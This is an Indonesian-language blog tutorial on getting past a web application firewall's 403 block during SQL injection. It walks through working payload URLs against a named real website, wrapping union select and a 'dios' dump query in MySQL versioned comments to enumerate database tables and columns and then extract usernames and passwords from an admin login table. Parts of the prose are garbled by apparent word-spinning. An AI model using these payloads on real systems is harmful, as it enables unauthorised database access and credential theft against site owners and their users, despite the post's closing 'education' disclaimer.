Welcome Back to my blog terkeren terkece terupdate terpopuler brow, kali ini aku akan sedikit mengembangkan wacana Cara atau Metode Bypass SQL Injection 403 Forbidden, buat kalian yang suka bermain sql injection chall atau mendapat sasaran yang vuln sql injection niscaya sering mendapat website yang forbidden ketika ingin mengekploitasinya.
hening jangan khawatir blog ini punya solusinya untuk anda para peretas, tapi sebelumnya yang belum baca artikel sebelumnya kami sarankan untuk membaca artikel sebelumnya karna masih banyak berita-berita dan tutorial tutorial hacking, SEO.
Baca Juga
- Cara Patch Bug SQL-INJECTION
- Deface Method Restricted Area Shell Upload
- How to play music with termux
- Cara Mencari Admin Login Dengan Dirbuster
- Exploit CMS Magento 2.3.0 Vulnerability SQL Injection
Sebelumnya blog ini sudah membahas cara patching bug sql injection dan kini blog ini akan menciptakan artikel cara bypass sql injection 403 forbidden.
Kerentanan ini sangatlah parah untuk suatu website alasannya kita dapat mengambil isi yang ada dalam website tersebut menyerupai list email, username, password, dll data-data penting yang ada dalam database tersebut.
tapi kali ini pembahasan nya bukan itu, pembahasan kali ini memanfaatkan celah bug tersebut, dari pada lama-lama mending pribadi aja let's go!!
https://tisplanet.com/service-item.php?id=3Di klarifikasi kali ini aku tidak akan menejelaskan sedetail mungkin.
Karena ditutorial ini mungkin kalian sudah pada paham basic sqli, jadi pribadi ke inti permasalahannya saja ya.
Oke sepakat kita lanjutkan, aku asumsikan udah ke tahap union+select
Gue disini sesudah melaksanakan order+by untuk mendapat jumlah column dan ketika mau masukan query union+select ternyata malah kena security waf 403 Forbidden.
Untuk cara bypassnya cukup kita menambahkan beberapa abjad mysql-comments. Di sasaran aku disini yang kena waf di union+select jadi kita tinggal menambahkan beberapa abjad mysql-comments,
Contoh,
union+select
Kita tambahkan mysql-commentsnya jadi,
/*!union*/+/*!select*/
/*!12345union*/+/*!12345select*/
Nahh jadi misalnya menyerupai ini,
https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,4,5,6,7,8--+
Lihat digambar dibawah ini, bypassed.
Terus kalo udah tau angka magicknya yang keluar, selanjutnya tinggal masukan diosnya. Gue pilih angka 4 untuk dikasih dios berikut perintah lengkapnya,
https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7,8--+
Kena 403 Forbidden lagi anjirr mari kita bypass.
Oke berarti yang harus dibypass ialah diosnya, alasannya tadi pas mau dikasih dios malah kena waf 403 forbidden.
Untuk bypass diosnya sama menyerupai waktu bypass union+select tinggal menambahkan abjad mysql-comments. Lebih jelasnya menyerupai ini,
https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),5,6,7,8--+
Bypass sukses, lihat gambar diatas gan.
Selanjutnya tinggal ngedump username beserta passwordnya menyerupai ini,
https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345admin_login*/)where@:=make_set(511,@,0x3c6c693e,/*!12345username*/,/*!12345password*/)),@),5,6,7,8--+
booms username & password nya keluarkan, hehe, etapi jadikan ini semua sebagai edukasi dan jangan lupa untuk share ke teman-teman kalian biar semua tau, ingat UU ITE ada disekeliling kita jadi tetap SMART USER oke. Semoga bermanfaat terima kasih.